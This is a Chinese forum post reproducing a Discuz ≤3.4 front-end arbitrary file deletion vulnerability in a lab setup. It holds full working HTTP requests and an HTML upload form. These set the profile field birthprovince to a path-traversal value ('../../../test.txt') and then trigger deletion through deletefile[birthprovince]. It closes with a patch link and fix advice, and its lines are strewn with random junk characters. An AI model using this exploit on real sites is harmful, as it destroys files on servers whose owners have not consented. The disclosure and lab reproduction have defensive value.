|
|
" D% k; K( T+ C2 ~. x
2 I5 i! B7 E3 \前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。+ T3 U9 u# H: t# t: ~
影响版本:Discuz < =3.4 环境
3 E* j# o" a: |) o
7 y1 ^: h: O% _- d6 [' J复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。. K6 u7 R! ]8 d7 f5 d6 w
新建test.txt2 y1 a+ q$ Q9 e1 E
访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。
& i: G R7 l& W1 N2 t+ C, a& V+ }7 [/ `5 [% d5 M
2 u4 \7 E/ a5 \8 m查看formhash# ^% x, Y7 {; ?$ l. F2 s
利用burp抓包,获取cookie0 u9 P5 P! K) F. E2 K" m6 e i
, h& N2 c5 y2 G( O8 n1 T6 ~
; m# Z% p4 f( Y5 ]+ c% Q9 z6 C' _7 [8 r
2 Z4 t# J5 A# N: o5 K6 X2 i( K3 S6 b+ e: j- X" E
抓取cookie2 F4 F' ^1 D( \( q9 _8 T
6 y3 K4 Z, \& ?( X
发送下面数据包:修改cookie,formhash,还有删除的文件
0 U9 L1 @$ `: L R8 QPOST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.11 V5 {! N( Y# K( L) E
Host: localhost" W% Y B3 E5 C* {
Content-Length: 3678 ^7 t! Y" A& ~' y3 t/ T# a5 B' \6 l6 I
Cache-Control: max-age=0
3 G0 [7 ]% [2 \* t5 t$ z7 t k. R6 JUpgrade-Insecure-Requests: 1
$ Z1 p+ P1 _$ Z2 I7 r) FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
# B/ ] H( Q7 p3 ~+ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.364 ?0 u8 Q+ G( x' x2 [( n7 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8# P* K1 V$ J0 Q5 ]) d1 u
Accept-Encoding: gzip, deflate
) K4 n0 X, U+ kAccept-Language: zh-CN,zh;q=0.8,en;q=0.6: s! i( z1 }- Y! F/ u$ B
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056 b' a! w4 w3 F4 j6 c* X! Q
Connection: close
& Z/ U) ~8 q3 a------WebKitFormBoundaryPFvXyxL45f34L12s
! y8 Q6 O/ A- [9 ?, ?: wContent-Disposition: form-data; name="formhash"" W# X/ o" B m' i9 {- R
84a7f376
6 {( I* B, o6 I& X; I------WebKitFormBoundaryPFvXyxL45f34L12s
H% W. q- z: fContent-Disposition: form-data; name="birthprovince"
/ a2 x( a! w$ g* e: s& \( `../../../test.txt
( K) j; N" R& z------WebKitFormBoundaryPFvXyxL45f34L12s
# s, z4 F c7 Z$ z# BContent-Disposition: form-data; name="profilesubmit"
^6 F2 U0 J1 u* U* a0 s2 r1
/ U3 D$ w- y$ C: T/ [# d------WebKitFormBoundaryPFvXyxL45f34L12s--
& n0 Z0 a% ~3 c+ t$ J发送删除的数据包3 d7 ?' P& F% X2 o5 b; ?
刷新页面,查看出生地就会显示成下图所示的状态:# {3 Q ^9 G o
数据成功写入
3 ]% q; U7 n1 Q. C" ]- Q8 \$ x* ]' n9 Q$ i9 ?6 O, a( ?
3 ?) Y8 S9 f% ? |6 t说明数据已经进入数据库:& S- W, O1 [0 p1 H' g
然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:2 I5 `) K) A- t3 y
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">" [6 a; q+ H/ S& M9 |+ U' [4 `3 R
<input type="file"name="birthprovince" id="file" />
6 w z! E% j+ u }" a8 g7 ]<input type="text"name="formhash" value="84a7f376"/></p>7 ]6 }* _$ r7 R. }7 N. ?1 ]
<input type="text"name="profilesubmit" value="1"/></p>
3 s; Y- P$ @2 u. ] ~<input type="submit"value="Submit" />
: ]4 P2 d" U9 E3 k' ~- `1 W- b</from>
+ _! A; R2 h/ X+ D5 P) p7 D
( C9 @4 \% ~3 C/ k8 T9 K+ x6 `4 i! J1 I- s( D% z7 x( Y( X
8 O2 u$ L% F7 x- Q
! g- ^: ^5 {( Q* q, k, ]8 B
& j1 f( c% R1 }7 O2 j& n f, H& b或者直接构建数据包:
0 L9 \9 a" ~* s4 M u4 P) X3 W1 iPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1# p8 x# J4 ^5 {, ]& R) r$ E
Host: 192.168.220.131
& V& M- u8 H T7 N" oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0- B- a7 d1 r2 @( \! z3 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* w5 ?& q5 x- B$ m0 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 O& d/ J- d0 c' x) ^# _3 p9 ~, E F
Accept-Encoding: gzip, deflate& @3 B* v- @( i# m1 J# G6 ^5 [. S
Content-Type: multipart/form-data; boundary=---------------------------123821742118716* X4 K, `) @, r5 ]1 \* @
Content-Length: 91989
2 {. E# |6 e% S R5 [0 j( M; a0 PConnection: close
. i. }/ c$ d. s% \: yCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056. A8 t6 J( _- Q8 Y7 y; Y1 J3 n9 N7 Z
Upgrade-Insecure-Requests: 1: W! _# }6 m% N- }. f- u0 s
-----------------------------123821742118716
) d0 F' E# E$ l. t$ x( [7 h3 oContent-Disposition: form-data; name="birthprovince"; filename="0.jpg"
& N/ F: L& q. ]9 \) Q) j- {Content-Type: image/jpeg* s3 H8 V c/ D: g
zerba(这里写啥都可以)
8 O1 C& c) G/ f9 b-----------------------------123821742118716--- F/ v/ ?2 I( `0 T' {
* b, }% f5 y$ o E8 k. x3 a7 X" t
$ v2 Z! w4 Y) E& T. k4 w: [% p, w% x8 d) Q) c; H4 [
9 C3 b$ h- U% d, K, ]9 f# j, p3 ^
5 {+ ~- [ v) x c
; b3 y: n V3 j, V% l& X
! R6 W( D8 z6 @. ^' o8 V5 B. E$ e, ~; F: b) O5 t; f' H
) s% o& X U6 r
3 L/ n! h+ N$ ]1 B+ d7 t: o6 f
' K+ u" O/ {, W R9 f8 m* X8 G进去discuz看看,可以看到,test.txt文件已经被删除了。
: J: Z6 b7 ~" G! B9 h) ^' R; e
/ a9 t8 h6 G1 N$ y1 T! |( Y* c, y6 v: r9 ?
. U; W; l& g7 e- l
4 O# m! D: T0 U6 l2 {- `
# D( `. C" \. q7 Q7 k8 |修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e5748 q' ^$ L x# y$ c) c, _
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。$ ^2 I5 |3 C* e$ s7 ]' H
: }" {& G1 T1 k( o$ ?! S \
; b/ v0 |+ O1 }6 t8 ~0 r
# u( i! T7 y" |2 T" V* s" j
) d% ^9 |( ]( l; R) h& ^2 l8 F9 M1 x, u3 e5 }. H
% }" O* B+ f. M8 C& b/ C. }
$ v; |! P4 q- w
+ Y8 ]% p( J/ A# U* G) q( J; z0 k1 `6 t9 q( f7 p5 [8 H0 ~2 _
|
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜